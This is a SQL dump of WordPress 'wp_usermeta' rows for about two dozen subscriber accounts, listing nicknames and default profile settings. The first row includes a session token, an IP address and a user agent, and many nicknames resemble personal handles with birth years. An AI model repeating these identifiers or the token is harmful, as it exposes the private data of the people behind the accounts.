INSERT INTO `wp_usermeta` VALUES (26694, 1842, 'session_tokens', 'a:1:{s:64:"3a333a650dfc0a46993bc2b348c513570056c79667b3eb746ce4414c189c4877";a:4:{s:10:"expiration";i:1501856682;s:2:"ip";s:15:"184.180.120.189";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1500647082;}}'); 
INSERT INTO `wp_usermeta` VALUES (26695, 1843, 'nickname', 'kurtzd11987'); 
INSERT INTO `wp_usermeta` VALUES (26696, 1843, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26697, 1843, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26698, 1843, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26699, 1843, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26700, 1843, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26701, 1843, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26702, 1843, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26703, 1843, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26704, 1843, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26705, 1843, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26706, 1843, '_yoast_wpseo_profile_updated', '1500648926'); 
INSERT INTO `wp_usermeta` VALUES (26707, 1843, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26708, 1844, 'nickname', 'alvin.taylor1955'); 
INSERT INTO `wp_usermeta` VALUES (26709, 1844, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26710, 1844, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26711, 1844, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26712, 1844, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26713, 1844, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26714, 1844, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26715, 1844, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26716, 1844, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26717, 1844, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26718, 1844, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26719, 1844, '_yoast_wpseo_profile_updated', '1500654459'); 
INSERT INTO `wp_usermeta` VALUES (26720, 1844, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26721, 1845, 'nickname', 'wdeutsch1984'); 
INSERT INTO `wp_usermeta` VALUES (26722, 1845, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26723, 1845, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26724, 1845, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26725, 1845, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26726, 1845, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26727, 1845, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26728, 1845, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26729, 1845, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26730, 1845, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26731, 1845, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26732, 1845, '_yoast_wpseo_profile_updated', '1500654616'); 
INSERT INTO `wp_usermeta` VALUES (26733, 1845, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26734, 1846, 'nickname', 'johnxue881992'); 
INSERT INTO `wp_usermeta` VALUES (26735, 1846, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26736, 1846, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26737, 1846, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26738, 1846, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26739, 1846, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26740, 1846, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26741, 1846, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26742, 1846, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26743, 1846, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26744, 1846, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26745, 1846, '_yoast_wpseo_profile_updated', '1500655926'); 
INSERT INTO `wp_usermeta` VALUES (26746, 1846, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26747, 1847, 'nickname', 'jujumanuel1962'); 
INSERT INTO `wp_usermeta` VALUES (26748, 1847, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26749, 1847, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26750, 1847, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26751, 1847, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26752, 1847, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26753, 1847, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26754, 1847, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26755, 1847, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26756, 1847, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26757, 1847, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26758, 1847, '_yoast_wpseo_profile_updated', '1500657806'); 
INSERT INTO `wp_usermeta` VALUES (26759, 1847, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26760, 1848, 'nickname', 'ddamevski1993'); 
INSERT INTO `wp_usermeta` VALUES (26761, 1848, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26762, 1848, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26763, 1848, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26764, 1848, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26765, 1848, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26766, 1848, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26767, 1848, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26768, 1848, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26769, 1848, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26770, 1848, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26771, 1848, '_yoast_wpseo_profile_updated', '1500688652'); 
INSERT INTO `wp_usermeta` VALUES (26772, 1848, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26773, 1849, 'nickname', 'kazza6201955'); 
INSERT INTO `wp_usermeta` VALUES (26774, 1849, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26775, 1849, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26776, 1849, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26777, 1849, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26778, 1849, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26779, 1849, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26780, 1849, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26781, 1849, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26782, 1849, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26783, 1849, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26784, 1849, '_yoast_wpseo_profile_updated', '1500692986'); 
INSERT INTO `wp_usermeta` VALUES (26785, 1849, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26786, 1850, 'nickname', 'timur1995'); 
INSERT INTO `wp_usermeta` VALUES (26787, 1850, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26788, 1850, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26789, 1850, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26790, 1850, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26791, 1850, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26792, 1850, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26793, 1850, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26794, 1850, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26795, 1850, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26796, 1850, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26797, 1850, '_yoast_wpseo_profile_updated', '1500694722'); 
INSERT INTO `wp_usermeta` VALUES (26798, 1850, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26799, 1851, 'nickname', 'shadow74701969'); 
INSERT INTO `wp_usermeta` VALUES (26800, 1851, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26801, 1851, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26802, 1851, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26803, 1851, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26804, 1851, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26805, 1851, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26806, 1851, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26807, 1851, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26808, 1851, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26809, 1851, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26810, 1851, '_yoast_wpseo_profile_updated', '1500704549'); 
INSERT INTO `wp_usermeta` VALUES (26811, 1851, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26812, 1852, 'nickname', 'vpmcmahon1986'); 
INSERT INTO `wp_usermeta` VALUES (26813, 1852, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26814, 1852, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26815, 1852, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26816, 1852, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26817, 1852, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26818, 1852, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26819, 1852, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26820, 1852, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26821, 1852, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26822, 1852, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26823, 1852, '_yoast_wpseo_profile_updated', '1500708844'); 
INSERT INTO `wp_usermeta` VALUES (26824, 1852, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26825, 1853, 'nickname', 'geneshiatillett121972'); 
INSERT INTO `wp_usermeta` VALUES (26826, 1853, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26827, 1853, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26828, 1853, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26829, 1853, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26830, 1853, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26831, 1853, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26832, 1853, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26833, 1853, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26834, 1853, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26835, 1853, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26836, 1853, '_yoast_wpseo_profile_updated', '1500728215'); 
INSERT INTO `wp_usermeta` VALUES (26837, 1853, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26838, 1854, 'nickname', 'scott9291992'); 
INSERT INTO `wp_usermeta` VALUES (26839, 1854, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26840, 1854, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26841, 1854, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26842, 1854, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26843, 1854, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26844, 1854, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26845, 1854, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26846, 1854, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26847, 1854, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26848, 1854, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26849, 1854, '_yoast_wpseo_profile_updated', '1500739250'); 
INSERT INTO `wp_usermeta` VALUES (26850, 1854, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26851, 1855, 'nickname', 'zadan7861956'); 
INSERT INTO `wp_usermeta` VALUES (26852, 1855, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26853, 1855, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26854, 1855, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26855, 1855, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26856, 1855, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26857, 1855, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26858, 1855, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26859, 1855, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26860, 1855, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26861, 1855, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26862, 1855, '_yoast_wpseo_profile_updated', '1500742284'); 
INSERT INTO `wp_usermeta` VALUES (26863, 1855, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26864, 1856, 'nickname', 'k_mansbridge2002'); 
INSERT INTO `wp_usermeta` VALUES (26865, 1856, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26866, 1856, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26867, 1856, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26868, 1856, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26869, 1856, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26870, 1856, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26871, 1856, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26872, 1856, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26873, 1856, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26874, 1856, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26875, 1856, '_yoast_wpseo_profile_updated', '1500747329'); 
INSERT INTO `wp_usermeta` VALUES (26876, 1856, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26877, 1857, 'nickname', 'joetrophoto1966'); 
INSERT INTO `wp_usermeta` VALUES (26878, 1857, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26879, 1857, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26880, 1857, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26881, 1857, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26882, 1857, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26883, 1857, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26884, 1857, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26885, 1857, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26886, 1857, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26887, 1857, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26888, 1857, '_yoast_wpseo_profile_updated', '1500747959'); 
INSERT INTO `wp_usermeta` VALUES (26889, 1857, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26890, 1858, 'nickname', 'montescv1988'); 
INSERT INTO `wp_usermeta` VALUES (26891, 1858, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26892, 1858, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26893, 1858, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26894, 1858, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26895, 1858, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26896, 1858, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26897, 1858, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26898, 1858, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26899, 1858, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26900, 1858, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26901, 1858, '_yoast_wpseo_profile_updated', '1500748131'); 
INSERT INTO `wp_usermeta` VALUES (26902, 1858, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26903, 1859, 'nickname', 'volar19632004'); 
INSERT INTO `wp_usermeta` VALUES (26904, 1859, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26905, 1859, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26906, 1859, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26907, 1859, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26908, 1859, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26909, 1859, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26910, 1859, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26911, 1859, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26912, 1859, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26913, 1859, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26914, 1859, '_yoast_wpseo_profile_updated', '1500750937'); 
INSERT INTO `wp_usermeta` VALUES (26915, 1859, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26916, 1860, 'nickname', 'mschnoetzinger1976'); 
INSERT INTO `wp_usermeta` VALUES (26917, 1860, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26918, 1860, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26919, 1860, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26920, 1860, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26921, 1860, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26922, 1860, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26923, 1860, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26924, 1860, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26925, 1860, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26926, 1860, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26927, 1860, '_yoast_wpseo_profile_updated', '1500752707'); 
INSERT INTO `wp_usermeta` VALUES (26928, 1860, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26929, 1861, 'nickname', 'camreezybdr1951'); 
INSERT INTO `wp_usermeta` VALUES (26930, 1861, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26931, 1861, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26932, 1861, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26933, 1861, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26934, 1861, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26935, 1861, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26936, 1861, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26937, 1861, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26938, 1861, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26939, 1861, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26940, 1861, '_yoast_wpseo_profile_updated', '1500755446'); 
INSERT INTO `wp_usermeta` VALUES (26941, 1861, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26942, 1862, 'nickname', 'johnhalls111966'); 
INSERT INTO `wp_usermeta` VALUES (26943, 1862, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26944, 1862, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26945, 1862, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26946, 1862, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26947, 1862, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26948, 1862, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26949, 1862, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26950, 1862, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26951, 1862, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26952, 1862, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26953, 1862, '_yoast_wpseo_profile_updated', '1500757061'); 
INSERT INTO `wp_usermeta` VALUES (26954, 1862, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26955, 1863, 'nickname', 'cristiclift1984'); 
INSERT INTO `wp_usermeta` VALUES (26956, 1863, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26957, 1863, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26958, 1863, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26959, 1863, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26960, 1863, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26961, 1863, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26962, 1863, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26963, 1863, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26964, 1863, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26965, 1863, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26966, 1863, '_yoast_wpseo_profile_updated', '1500764857'); 
INSERT INTO `wp_usermeta` VALUES (26967, 1863, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26968, 1864, 'nickname', 'stephanie.dolezal1992'); 
INSERT INTO `wp_usermeta` VALUES (26969, 1864, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26970, 1864, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26971, 1864, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26972, 1864, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26973, 1864, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26974, 1864, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26975, 1864, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26976, 1864, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26977, 1864, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26978, 1864, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26979, 1864, '_yoast_wpseo_profile_updated', '1500773159'); 
INSERT INTO `wp_usermeta` VALUES (26980, 1864, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26981, 1865, 'nickname', 'ndfaz1987'); 
INSERT INTO `wp_usermeta` VALUES (26982, 1865, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26983, 1865, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26984, 1865, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26985, 1865, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26986, 1865, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26987, 1865, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26988, 1865, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26989, 1865, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26990, 1865, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26991, 1865, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26992, 1865, '_yoast_wpseo_profile_updated', '1500777763'); 
INSERT INTO `wp_usermeta` VALUES (26993, 1865, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26994, 1866, 'nickname', 'fielding.mike1961'); 
INSERT INTO `wp_usermeta` VALUES (26995, 1866, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26996, 1866, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26997, 1866, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26998, 1866, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26999, 1866, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (27000, 1866, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (27001, 1866, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (27002, 1866, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (27003, 1866, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (27004, 1866, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (27005, 1866, '_yoast_wpseo_profile_updated', '1500777870'); 
INSERT INTO `wp_usermeta` VALUES (27006, 1866, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (27007, 1867, 'nickname', 'adam_andre1986'); 
INSERT INTO `wp_usermeta` VALUES (27008, 1867, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (27009, 1867, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (27010, 1867, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (27011, 1867, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (27012, 1867, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (27013, 1867, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (27014, 1867, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (27015, 1867, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (27016, 1867, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (27017, 1867, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (27018, 1867, '_yoast_wpseo_profile_updated', '1500779655'); 
INSERT INTO `wp_usermeta` VALUES (27019, 1867, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (27020, 1868, 'nickname', 'mmjanson1952'); 
